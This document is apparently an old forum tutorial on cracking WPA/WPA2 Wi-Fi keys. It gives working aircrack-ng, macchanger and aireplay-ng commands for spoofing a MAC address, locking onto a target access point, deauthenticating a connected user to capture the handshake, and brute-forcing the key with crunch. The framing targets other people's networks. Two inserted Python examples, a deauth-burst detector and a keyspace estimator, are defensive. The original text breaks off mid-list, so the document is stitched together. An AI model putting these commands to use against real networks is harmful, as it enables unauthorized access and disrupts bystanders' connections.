WPA/WPA2 hacking

  • WPA/WPA2 Cracking by BurnMeDown
    Software in use
    OS: Ubuntu 10.04 LTS
    Software: Crunch 3.3 (dictionary generator)
    A note before you begin this tutorial: do not expect to crack a WPA key quickly. They take time (days, weeks, months) to crack.
    Some tips before we start. 
    Major companies like AT&T, Comcast, and Charter often use 12-digit numeric passwords.
    4 in 10 passwords are often phone numbers in your local area.
    2 in 10 are alphanumeric.
    (Statistics are based on my personal research)
    To begin we need to turn off your wireless card so we can change the MAC address. The following commands do this (enter them without the list numbers):
    1. airmon-ng stop wlan0
    2. macchanger -m 00:11:22:33:44:55 wlan0
    1. This turns off the wireless card, allowing you to manipulate it.
    2. macchanger is good for hiding your MAC address and also for spoofing other MAC addresses when someone is using a MAC filter to keep you out.
    Now we need to turn the card back on and put it in monitor mode.
    1. airmon-ng start wlan0
    The output after this command should show that mon0 is now enabled, meaning you've put the card in monitor mode.
    Now let's get our hands dirty.
    1. airodump-ng mon0
    2. airodump-ng -c 6 -w somepoorbastard --bssid 55:44:33:22:11:00 mon0
    1. This is the recon tool. It monitors everything in the area. You need to keep this window visible at all times to determine whether you got the handshake. The command starts monitoring on mon0.
    2. With this command you use your recon tool to lock on to this person's AP. This must be opened in a new window or tab; I'll explain why in a minute.
    Command explanation:
    -c 6 (target channel the AP is on)
    -w (name of the file you wish to create that will hold the handshake)
    --bssid 55:44:33:22:11:00 (the MAC address of the AP to lock on to)
    mon0 (tells airodump-ng to monitor on device mon0)
    The recon window is what tells you if you have received the handshake; the lock-down window won't do this. BUT!!!! the lock-down window is needed because when you lock onto the AP it creates a file that will hold the handshake when you get it. In this case the name of the file will be "somepoorbastard-01.cap".
    Now that we have that done: the handshake can actually be captured at any time just by leaving it sitting there, but that can take hours to happen. Let's do it the fast way, but first some more tips.
    APs that are close are easier to get a handshake from; the further away they are, the harder you're going to have to work for it. In this tutorial I will show you 3 stages you can use for close, middle, and far-away APs. To do these stages, though, we need someone we can disconnect from the AP. That's right: you need to deauthenticate another user who is actually connected to the AP you want the handshake from.
    Stage 1. aireplay-ng -0 1 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 2. aireplay-ng -0 10 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 3. aireplay-ng -0 0 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 1 you can use for APs that are close to you.
    Stage 2 you can use for APs that are at about a middle range.
    Stage 3 you can use for APs that are far away (these often take the longest).
    Command explanation:
    aireplay-ng This is used to conduct your basic attacks for retrieving wifi data and passwords.
    -0 1 This tells aireplay-ng to conduct a deauth attack once. 10 for ten deauth attacks, and 0 for an infinite attack (this works best for those users you need to deauth who are almost out of range).
    -a specifies the BSSID of the AP you are locked onto.
    -c specifies the user (client) you are trying to disconnect from that BSSID.
    mon0 Well, you should have guessed what this is doing: it tells aireplay-ng to attack with this device.
    Now if all has gone well and you have disconnected a user and he reconnects, you should have the WPA handshake. You can tell if you have the handshake by looking in the recon window: at the top right it will say "WPA handshake" and list the MAC address of the AP you got it from.
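    From the defender's side, the deauth stages above have a recognisable signature: many deauthentication or disassociation frames to the same client in a short window, carrying the AP's own address as transmitter. The following is an added example, not code from the original post, showing the detection logic run over a small constructed set of decoded management-frame records. The record layout (timestamp, subtype, receiver, transmitter, BSSID) and the window/threshold defaults are assumptions of this example; a real deployment would feed it frames decoded from a monitor-mode capture.

```python
from collections import defaultdict

# 802.11 management frame subtypes (IEEE 802.11 Type 0)
DEAUTH = 12     # Deauthentication
DISASSOC = 10   # Disassociation
BEACON = 8      # Beacon

# Constructed sample records (not a real capture), standing in for decoded management
# frames: (timestamp_s, subtype, receiver, transmitter, bssid). The burst at t=30 uses
# the AP's own address as transmitter, exactly as a forged deauth would, so the
# detector relies on rate rather than on addresses.
SAMPLE_FRAMES = [
    (1.0, BEACON, "ff:ff:ff:ff:ff:ff", "55:44:33:22:11:00", "55:44:33:22:11:00"),
    # a single deauth is normal (idle timeout, client roaming) and must not alert
    (2.5, DEAUTH, "33:22:11:00:44:55", "55:44:33:22:11:00", "55:44:33:22:11:00"),
] + [
    (30.0 + i * 0.05, DEAUTH, "33:22:11:00:44:55", "55:44:33:22:11:00", "55:44:33:22:11:00")
    for i in range(10)
] + [
    # two broadcast disassociations: below threshold, no alert
    (35.0, DISASSOC, "ff:ff:ff:ff:ff:ff", "55:44:33:22:11:00", "55:44:33:22:11:00"),
    (36.0, DISASSOC, "ff:ff:ff:ff:ff:ff", "55:44:33:22:11:00", "55:44:33:22:11:00"),
    (40.0, BEACON, "ff:ff:ff:ff:ff:ff", "55:44:33:22:11:00", "55:44:33:22:11:00"),
]


def detect_deauth_bursts(frames, window_s=5.0, threshold=5):
    """Return one alert per (bssid, receiver) pair whose count of deauth/disassoc
    frames inside any sliding window of window_s seconds reaches threshold.
    Each alert reports the peak count and the start of the window where it occurred."""
    by_target = defaultdict(list)
    for ts, subtype, receiver, transmitter, bssid in frames:
        if subtype in (DEAUTH, DISASSOC):
            by_target[(bssid, receiver)].append(ts)

    alerts = []
    for (bssid, receiver), stamps in by_target.items():
        stamps.sort()
        start = 0
        peak, peak_window_start = 0, None
        # two-pointer sliding window over sorted timestamps
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            count = end - start + 1
            if count > peak:
                peak, peak_window_start = count, stamps[start]
        if peak >= threshold:
            alerts.append({
                "bssid": bssid,
                "client": receiver,
                "count": peak,
                "window_start": peak_window_start,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {alert['count']} frames to {alert['client']} "
              f"from BSSID {alert['bssid']} starting at t={alert['window_start']}s")
```

    Because a forged deauth is indistinguishable by address from a genuine one, the usable signal is volume and timing, which is why the detector keys on a per-client rate. The mitigation that removes the attack outright is 802.11w Protected Management Frames, which authenticates deauthentication and disassociation frames so that unsigned ones are dropped by the client.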
    Time to crack :) 
    If you have downloaded crunch (which is required) you need to open a new tab or window, then change your directory in it to your crunch directory.
    1. cd crunch3.3
    (explained) I'm not explaining this; if you don't know what cd in a command window does then you don't belong here.
    Now that you have changed directories, we will pipe crunch into aircrack-ng so it's like a fire-and-forget dictionary that discards the passwords it has checked. (This saves you from having to build a large dictionary that takes up space on your computer.)
    1. ./crunch 8 12 0123456789 | aircrack-ng -e somepoorbastard /home/user/somepoorbastard-01.cap -w -
    1. ./crunch calls the crunch command (only works in the crunch directory).
    2. 8 12 This is the minimum and maximum number of characters to use.
    3. 0123456789 This is where you type which characters you want to use. Any characters can be placed there.
    4. |  <
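    The warning at the top of the post ("do not expect to crack a WPA key quickly") follows directly from the size of the pattern handed to crunch. The following is an added example, not code from the original post, that computes how many candidates a crunch MIN MAX CHARSET pattern generates and how long exhausting them takes at a given test rate. The 1,000 keys/s rate is an assumption for illustration, not a measurement; the password profiles are taken from the post's tips, and the "area code known" profile assumes the first three digits of a local phone number are fixed.

```python
# Added example: keyspace and worst-case time for crunch patterns piped into aircrack-ng.
# Every guess costs a PBKDF2 derivation, so WPA/WPA2 test rates are low; the default
# rate below is an assumed figure, replace it with what your hardware actually achieves.

def candidate_count(charset_size, min_len, max_len):
    """Number of strings 'crunch MIN MAX CHARSET' emits for a charset of charset_size symbols."""
    if charset_size < 1 or min_len < 1 or max_len < min_len:
        raise ValueError("invalid crunch pattern")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def exhaust_seconds(candidates, keys_per_second):
    """Worst-case time to test every candidate; the expected time is about half of this."""
    return candidates / keys_per_second


def human_duration(seconds):
    """Render a duration in the largest natural unit, one decimal place."""
    units = (("years", 365 * 24 * 3600), ("days", 24 * 3600),
             ("hours", 3600), ("minutes", 60))
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.0f} seconds"


# Profiles drawn from the post's tips: (charset size, min length, max length).
# "area code known" is an assumption of this example (3 fixed digits, 7 unknown);
# the alphanumeric profile assumes lowercase letters plus digits (36 symbols).
PROFILES = {
    "crunch 8 12 0123456789 (as in the post)": (10, 8, 12),
    "12-digit numeric (ISP default)": (10, 12, 12),
    "local phone number, area code known": (10, 7, 7),
    "8-char lowercase alphanumeric": (36, 8, 8),
}


def profile_report(profiles=PROFILES, keys_per_second=1000):
    """Return {profile name: (candidate count, worst-case seconds)} at the given rate."""
    report = {}
    for name, (charset_size, lo, hi) in profiles.items():
        n = candidate_count(charset_size, lo, hi)
        report[name] = (n, exhaust_seconds(n, keys_per_second))
    return report


if __name__ == "__main__":
    for name, (n, secs) in profile_report().items():
        print(f"{name:42s} {n:>18,d} candidates   worst case {human_duration(secs)}")
```

    At the assumed rate the post's own pattern (8 to 12 digits, about 1.1 trillion candidates) is a multi-decade job, while a phone number with a known area code is a few hours. That gap is the whole reason the post's tips about local phone numbers matter, and it is also the defender's lesson: an all-digit PSK, however long, is only as strong as the structure an attacker can guess about it.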